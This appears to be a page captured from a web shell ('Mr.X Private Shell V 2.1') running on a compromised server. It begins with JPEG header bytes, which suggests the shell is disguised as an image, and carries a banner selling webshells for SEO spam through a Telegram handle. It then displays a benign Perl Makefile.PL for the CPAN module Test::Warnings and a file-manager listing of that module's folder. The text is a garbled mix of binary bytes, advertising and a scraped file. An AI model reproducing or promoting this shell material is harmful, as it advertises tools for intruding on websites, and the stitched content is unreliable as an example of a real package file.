����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# This file was automatically generated by Dist::Zilla::Plugin::MakeMaker v6.032.
use strict;
use warnings;
use 5.006;
use ExtUtils::MakeMaker;
my %WriteMakefileArgs = (
"ABSTRACT" => "Test for warnings and the lack of them",
"AUTHOR" => "Karen Etheridge <ether\@cpan.org>",
"CONFIGURE_REQUIRES" => {
"ExtUtils::MakeMaker" => 0
},
"DISTNAME" => "Test-Warnings",
"LICENSE" => "perl",
"MIN_PERL_VERSION" => "5.006",
"NAME" => "Test::Warnings",
"PREREQ_PM" => {
"Carp" => 0,
"Exporter" => 0,
"Test::Builder" => 0,
"parent" => 0,
"strict" => 0,
"warnings" => 0
},
"TEST_REQUIRES" => {
"ExtUtils::MakeMaker" => 0,
"File::Spec" => 0,
"Term::ANSIColor" => 0,
"Test::More" => "0.94",
"if" => 0
},
"VERSION" => "0.038",
"test" => {
"TESTS" => "t/*.t"
}
);
my %FallbackPrereqs = (
"Carp" => 0,
"Exporter" => 0,
"ExtUtils::MakeMaker" => 0,
"File::Spec" => 0,
"Term::ANSIColor" => 0,
"Test::Builder" => 0,
"Test::More" => "0.94",
"if" => 0,
"parent" => 0,
"strict" => 0,
"warnings" => 0
);
unless ( eval { ExtUtils::MakeMaker->VERSION(6.63_03) } ) {
delete $WriteMakefileArgs{TEST_REQUIRES};
delete $WriteMakefileArgs{BUILD_REQUIRES};
$WriteMakefileArgs{PREREQ_PM} = \%FallbackPrereqs;
}
delete $WriteMakefileArgs{CONFIGURE_REQUIRES}
unless eval { ExtUtils::MakeMaker->VERSION(6.52) };
WriteMakefile(%WriteMakefileArgs);
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| blib | Folder | 0755 |
|
|
| examples | Folder | 0775 |
|
|
| lib | Folder | 0775 |
|
|
| t | Folder | 0775 |
|
|
| xt | Folder | 0775 |
|
|
| CONTRIBUTING | File | 4.08 KB | 0644 |
|
| Changes | File | 6.32 KB | 0640 |
|
| INSTALL | File | 2.36 KB | 0644 |
|
| LICENCE | File | 19.28 KB | 0644 |
|
| MANIFEST | File | 1.55 KB | 0644 |
|
| META.json | File | 47.17 KB | 0644 |
|
| META.yml | File | 27.07 KB | 0644 |
|
| MYMETA.json | File | 47.19 KB | 0644 |
|
| MYMETA.yml | File | 27.04 KB | 0644 |
|
| Makefile | File | 30.48 KB | 0644 |
|
| Makefile.PL | File | 1.4 KB | 0644 |
|
| README | File | 376 B | 0644 |
|
| dist.ini | File | 2.05 KB | 0640 |
|
| pm_to_blib | File | 0 B | 0644 |
|